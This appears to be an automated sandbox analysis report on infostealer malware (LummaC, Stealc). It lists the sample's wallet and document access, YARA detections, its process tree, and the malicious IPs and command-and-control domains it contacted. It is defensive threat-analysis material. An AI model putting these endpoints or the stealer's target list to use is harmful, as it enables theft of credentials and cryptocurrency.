Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: d7c50276ff.exe Binary or memory string: WIN_81
Source: d7c50276ff.exe Binary or memory string: WIN_XP
Source: d7c50276ff.exe, 0000000C.00000000.2619556994.0000000001022000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: d7c50276ff.exe Binary or memory string: WIN_XPe
Source: d7c50276ff.exe Binary or memory string: WIN_VISTA
Source: d7c50276ff.exe Binary or memory string: WIN_7
Source: d7c50276ff.exe Binary or memory string: WIN_8
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 00000021.00000003.2991405310.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d7c50276ff.exe PID: 6488, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 27.2.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.7d61336cf8.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.7d61336cf8.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ENORVNMU067PBMHUGECCERYC06W3ZY.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000000.2667130005.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2760497126.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2926562320.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.2909397637.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2687324655.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2591227334.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2924335248.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2688771618.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2493072660.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2404591407.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2807278591.0000000000A21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2634884064.0000000000A21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2806511011.000000000082B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2492114993.00000000004D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ENORVNMU067PBMHUGECCERYC06W3ZY.exe PID: 5636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7d61336cf8.exe PID: 1468, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 12_2_00FE1204
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 12_2_00FE1806
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540375 Sample: file.exe Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 105 studennotediw.store 2->105 107 steamcommunity.com 2->107 109 31 other IPs or domains 2->109 127 Suricata IDS alerts for network traffic 2->127 129 Found malware configuration 2->129 131 Antivirus detection for dropped file 2->131 133 16 other signatures 2->133 11 file.exe 3 2->11         started        16 aae25c676b.exe 2->16         started        18 skotes.exe 2->18         started        20 4 other processes 2->20 signatures3 process4 dnsIp5 113 sergei-esenin.com 172.67.206.204, 443, 49712, 49713 CLOUDFLARENETUS United States 11->113 115 steamcommunity.com 104.102.49.254, 443, 49710, 49901 AKAMAI-ASUS United States 11->115 117 185.215.113.16, 49763, 49868, 49900 WHOLESALECONNECTIONSNL Portugal 11->117 99 C:\Users\user\...\OLR88CERN7VQFRQ38J.exe, PE32 11->99 dropped 101 C:\...NORVNMU067PBMHUGECCERYC06W3ZY.exe, PE32 11->101 dropped 103 C:\Users\user\...\BF3BS0M5707K28RGW9.exe, PE32 11->103 dropped 183 Query firmware table information (likely to detect VMs) 11->183 185 Tries to harvest and steal ftp login credentials 11->185 187 Tries to harvest and steal browser information (history, passwords, etc) 11->187 195 4 other signatures 11->195 22 OLR88CERN7VQFRQ38J.exe 4 11->22         started        26 BF3BS0M5707K28RGW9.exe 9 1 11->26         started        28 ENORVNMU067PBMHUGECCERYC06W3ZY.exe 13 11->28         started        189 Hides threads from debuggers 16->189 191 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->191 193 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->193 31 firefox.exe 20->31         started        33 firefox.exe 20->33         started        35 taskkill.exe 20->35         started        37 4 other processes 20->37 file6 signatures7 process8 dnsIp9 89 C:\Users\user\AppData\Local\...\skotes.exe, PE32 22->89 dropped 135 Antivirus detection for dropped file 22->135 137 Detected unpacking (changes PE section rights) 22->137 139 Machine Learning detection for dropped file 22->139 153 2 other signatures 22->153 39 skotes.exe 4 25 22->39         started        141 Modifies windows update settings 26->141 143 Disables Windows Defender Tamper protection 26->143 145 Tries to evade debugger and weak emulator (self modifying code) 26->145 155 2 other signatures 26->155 119 185.215.113.37, 49847, 49933, 80 WHOLESALECONNECTIONSNL Portugal 28->119 147 Multi AV Scanner detection for dropped file 28->147 149 Hides threads from debuggers 28->149 151 Tries to detect sandboxes / dynamic malware analysis system (registry check) 28->151 121 youtube.com 142.250.186.110 GOOGLEUS United States 31->121 123 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 31->123 125 5 other IPs or domains 31->125 44 firefox.exe 31->44         started        46 firefox.exe 31->46         started        48 firefox.exe 33->48         started        50 conhost.exe 35->50         started        52 conhost.exe 37->52         started        54 conhost.exe 37->54         started        56 conhost.exe 37->56         started        58 conhost.exe 37->58         started        file10 signatures11 process12 dnsIp13 111 185.215.113.43, 49848, 49864, 49894 WHOLESALECONNECTIONSNL Portugal 39->111 91 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 39->91 dropped 93 C:\Users\user\AppData\...\d7c50276ff.exe, PE32 39->93 dropped 95 C:\Users\user\AppData\...\7d61336cf8.exe, PE32 39->95 dropped 97 5 other malicious files 39->97 dropped 157 Antivirus detection for dropped file 39->157 159 Detected unpacking (changes PE section rights) 39->159 161 Machine Learning detection for dropped file 39->161 163 5 other signatures 39->163 60 7d61336cf8.exe 39->60         started        63 aae25c676b.exe 39->63         started        65 d7c50276ff.exe 39->65         started        67 num.exe 39->67         started        69 firefox.exe 48->69         started        file14 signatures15 process16 signatures17 165 Antivirus detection for dropped file 60->165 167 Multi AV Scanner detection for dropped file 60->167 169 Detected unpacking (changes PE section rights) 60->169 181 3 other signatures 60->181 171 Machine Learning detection for dropped file 63->171 173 Tries to evade debugger and weak emulator (self modifying code) 63->173 175 Hides threads from debuggers 63->175 177 Binary is likely a compiled AutoIt script file 65->177 179 Found API chain indicative of sandbox detection 65->179 71 taskkill.exe 65->71         started        73 taskkill.exe 65->73         started        75 taskkill.exe 65->75         started        77 3 other processes 65->77 process18 process19 79 conhost.exe 71->79         started        81 conhost.exe 73->81         started        83 conhost.exe 75->83         started        85 conhost.exe 77->85         started        87 conhost.exe 77->87         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
172.67.206.204
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
142.250.186.110
 youtube.com United States
15169 GOOGLEUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
services.addons.mozilla.org 151.101.193.91 true
sergei-esenin.com 172.67.206.204 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.186.110 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
steamcommunity.com 104.102.49.254 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
normandy-cdn.services.mozilla.com 35.201.103.21 true
spirittunek.store unknown unknown
spocs.getpocket.com unknown unknown
licendfilteo.site unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
eaglepawnoy.store unknown unknown
bathdoomgaz.store unknown unknown
detectportal.firefox.com unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
normandy.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
dissapoiznw.store true
    		unknown
    https://steamcommunity.com/profiles/76561199724331900 true
      		unknown
      https://sergei-esenin.com/api true
        		unknown